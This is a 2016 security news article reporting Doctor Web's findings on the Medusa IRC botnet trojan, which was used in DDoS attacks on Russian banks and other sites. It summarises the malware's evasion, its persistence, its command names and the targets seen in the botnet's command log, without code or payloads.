Medusa DDoS Botnet Slams Russian Banks

Friday, November 18, 2016

Ionut Arghire

Fa42af438e58b799189dd26386f5870f

A new IRC bot used to carry out distributed denial of service (DDoS) attacks against the websites of a couple of Russian websites has emerged recently, researchers with the Russian security firm Doctor Web reveal.

Dubbed Trojan BackDoor.IRC.Medusa.1, the new piece of malware was used in DDoS attacks targeting the Rosbank and Eximbank banks, the security researchers say. The Trojan’s main purpose is the launch of DDoS attacks, and Doctor Web says that this specific malware might have been used against the recent attack on Sberbank.

Belonging to the IRC bot category, the Trojan can unite with other similar malware to create botnets. These Trojans receive commands over the IRC (Internet Relay Chat) protocol by connecting to specific channels and awaiting directives.

The analyzed Medusa Trojan sample was heavily obfuscated in an attempt to hinder analysis, the researchers explain. Once installed on a compromised system, the malware checks if specific applications are present, to ensure it isn’t running in a sandboxed environment. It also changes the Windows registry branch to autorun itself.

Doctor Web researchers have discovered that Medusa is being actively promoted on the underground, where its creators claim that a botnet consisting of 100 infected computers can generate up to 20,000-25,000 requests per second and that they could peak at 30,000. A diagram of an alleged test attack on the NGNIX http server is shown as proof.

The Medusa IRC bot was designed with support for several types of DDoS attacks, but it also has the ability to download and run executable files on the infected computers. The virus makers even published a botnet operator manual to provide details on the entire list of commands that the Trojan comes with.

Some of these commands include httpstrong, httppost, httpseebix, smartflood GET (along with stop for each of them, and a stop-all command to kill all of these operations at the same time), silent on/off, download join channel, update, and resetnick. Login and logout commands are also available.

The security researchers have identified 314 active connections on one of the IRC channels controlling the Medusa botnet. While inspecting the command log, the researchers discovered that the botnet’s operators attacked a series of sites multiple times between November 11 and November 14, 2016, including rosbank.ru (Rosbank), eximbank.ru (Eximbank), fr.livraison.lu and en.livraison.lu (the Livraison restaurant chain) and korytov-photographer.ru (a private website).

Related: Battling the Botnet Armies

Related: Mirai Botnet Infects Devices in 164 Countries

Related: Self-Spreading Linux Trojan Creates P2P Botnet

18975
Post Rating I Like this!
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.